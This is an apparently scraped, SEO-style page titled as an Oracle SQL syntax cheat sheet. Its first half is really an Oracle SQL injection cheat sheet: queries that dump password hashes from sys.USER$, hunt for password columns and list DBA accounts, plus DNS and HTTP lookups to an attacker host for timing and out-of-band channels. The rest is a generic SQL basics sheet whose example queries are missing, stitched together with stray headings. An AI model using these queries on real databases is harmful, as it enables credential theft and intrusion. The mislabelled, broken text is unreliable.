Oracle Sql Syntax Cheat Sheet

Sql Statements Cheat Sheet
Oracle Sql Syntax Cheat Sheet 2019
Oracle Sql Functions Cheat Sheet
Oracle Sql Syntax Cheat Sheet Download

SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;

This chapter presents the syntax for Oracle SQL statements. This chapter includes the following section: Syntax for SQL Statements Syntax for SQL Statements SQL statements are the means by which programs and users access data in an Oracle database. The sections that follow show each SQL statement and its related syntax. SQL Cheat Sheet. Now that we have touched a few topics related to SQL, lets acutally look at an SQL cheat sheet. For instance, what is actually composing this structure query language (SQL) syntax? SQL Language Elements. The sql syntax is actually very detailled. It is composed of many elements, which we will look into: SQL Keywords. This 'cheat sheet' covers most of the basic functionality that an Oracle DBA needs to run basic queries and perform basic tasks. It also contains information that a PL/SQL programmer frequently uses to write stored procedures.

SELECT version FROM v$instance;

Comments
SELECT 1 FROM dual — comment
— NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.

Current User
SELECT USER FROM dual

List Users
SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.USER$; — priv

List Password Hashes
SELECT name, password, astatus FROM sys.USER$ — priv, <= 10g. astatus tells you if acct is locked
SELECT name,spare4 FROM sys.USER$ — priv, 11g

Password Cracker
checkpwd quebrará o hashes DES-based da Oracle 8, 9 e 10

List Privileges
SELECT * FROM session_privs; — current privs
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA Accounts
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles

Current Database
SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases
SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
— Also query TNS listener for other databases. See tnscmd (services | status).

List Columns
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME = ‘blah’ AND owner = ‘foo’;

List Tables
SELECT TABLE_NAME FROM all_tables;
SELECT owner, TABLE_NAME FROM all_tables;

Find Tables From Column Name
SELECT owner, TABLE_NAME FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case

Select Nth Row
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)

Select Nth Char
SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’

Bitwise AND
SELECT bitand(6,2) FROM dual; — returns 2
SELECT bitand(6,1) FROM dual; — returns0

ASCII Value -> Char
SELECT chr(65) FROM dual; — returns A

Char -> ASCII Value
SELECT ascii(‘A’) FROM dual; — returns 65

Casting
SELECT CAST(1 AS CHAR) FROM dual;
SELECT CAST(‘1’ AS INT) FROM dual;

String Concatenation
SELECT ‘A’ || ‘B’ FROM dual; — returns AB

If Statement
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements

Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2

Avoiding Quotes
SELECT chr(65) || chr(66) FROM dual; — returns AB

Time Delay
BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual; — if reverse looks are slow
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow
— Veja também Consultas Queries para criar um time delay

Make DNS Requests
SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;

Command Execution
Java pode ser usado para executar comandos se ele estiver instalado.
Extproc às vezes pode ser usado também.

Local File Access
UTL_FILE às vezes pode ser usado. Verifique se o seguinte não é nulo:
SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;
Java pode ser usado para ler e gravar arquivos se for instalado (ele não está disponível no Oracle Express)

Hostname, IP Address
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
SELECT UTL_INADDR.get_host_name(‘10.0.0.1’) FROM dual; — gets hostnames

Location of DB files
SELECT name FROM V$DATAFILE;

Default/System Databases
SYSTEM
SYSAUX

Fonte: http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet

Extra:

Download this 2-page SQL Basics Cheat Sheet in PDF or PNG format, print it out, and stick to your desk.

The SQL Basics Cheat Sheet provides you with the syntax of all basics clauses, shows you how to write different conditions, and has examples. You can download this cheat sheet as follows:

You may also read the contents here:

SQL Basics Cheat Sheet

SQL

SQL, or Structured Query Language, is a language to talk to databases. It allows you to select specific data and to build complex reports. Today, SQL is a universal language of data. It is used in practically all technologies that process data.

SAMPLE DATA

QUERYING SINGLE TABLE

Fetch all columns from the country table:

Fetch id and name columns from the city table:

Fetch city names sorted by the rating column in the default ASCending order:

Fetch city names sorted by the rating column in the DESCending order:

Aliases

Columns

Tables

FILTERING THE OUTPUT

COMPARISON OPERATORS

Fetch names of cities that have a rating above 3:Fetch names of cities that are neither Berlin nor Madrid:

TEXT OPERATORS

Fetch names of cities that start with a 'P' or end with an 's':Fetch names of cities that start with any letter followed by'ublin' (like Dublin in Ireland or Lublin in Poland):

OTHER OPERATORS

Fetch names of cities that have a population between 500K and 5M:Fetch names of cities that don't miss a rating value:Fetch names of cities that are in countries with IDs 1, 4, 7, or 8:

QUERYING MULTIPLE TABLES

INNER JOIN

JOIN (or explicitly INNER JOIN) returns rows that have matching values in both tables.

LEFT JOIN

LEFT JOIN returns all rows from the left table with corresponding rows from the right table. If there's no matching row, NULLs are returned as values from the second table.

RIGHT JOIN

RIGHT JOIN returns all rows from the right table with corresponding rows from the left table. If there's no matching row, NULLs are returned as values from the left table.

FULL JOIN

FULL JOIN (or explicitly FULL OUTER JOIN) returns all rows from both tables – if there's no matching row in the second table, NULLs are returned.

CROSS JOIN

CROSS JOIN returns all possible combinations of rows from both tables. There are two syntaxes available.

NATURAL JOIN

NATURAL JOIN will join tables by all columns with the same name.

NATURAL JOIN used these columns to match rows:
city.id, city.name, country.id, country.name.
NATURAL JOIN is very rarely used in practice.

AGGREGATION AND GROUPING

GROUP BYgroups together rows that have the same values in specified columns. It computes summaries (aggregates) for each unique combination of values.

AGGREGATE FUNCTIONS

avg(expr) − average value for rows within the group
count(expr) − count of values for rows within the group
max(expr) − maximum value within the group
min(expr) − minimum value within the group
sum(expr) − sum of values within the group

EXAMPLE QUERIES

Find out the number of cities:

Find out the number of cities with non-null ratings:

Find out the number of distinctive country values:

Find out the smallest and the greatest country populations:

Find out the total population of cities in respective countries:

Find out the average rating for cities in respective countries if the average is above 3.0:

SUBQUERIES

A subquery is a query that is nested inside another query, or inside another subquery. There are different types of subqueries.

SINGLE VALUE

The simplest subquery returns exactly one column and exactly one row. It can be used with comparison operators =, <, <=, >, or >=.

This query finds cities with the same rating as Paris:

MULTIPLE VALUES

A subquery can also return multiple columns or multiple rows. Such subqueries can be used with operators IN, EXISTS, ALL, or ANY.

This query finds cities in countries that have a population above 20M:

CORRELATED

A correlated subquery refers to the tables introduced in the outer query. A correlated subquery depends on the outer query. It cannot be run independently from the outer query.

This query finds cities with a population greater than the average population in the country:

This query finds countries that have at least one city:

SET OPERATIONS

Set operations are used to combine the results of two or more queries into a single result. The combined queries must return the same number of columns and compatible data types. The names of the corresponding columns can be different

UNION

UNION combines the results of two result sets and removes duplicates. UNION ALL doesn't remove duplicate rows.

This query displays German cyclists together with German skaters:

INTERSECT

Sql Statements Cheat Sheet

INTERSECT returns only rows that appear in both result sets.

This query displays German cyclists who are also German skaters at the same time:

EXCEPT

EXCEPT returns only the rows that appear in the first result set but do not appear in the second result set.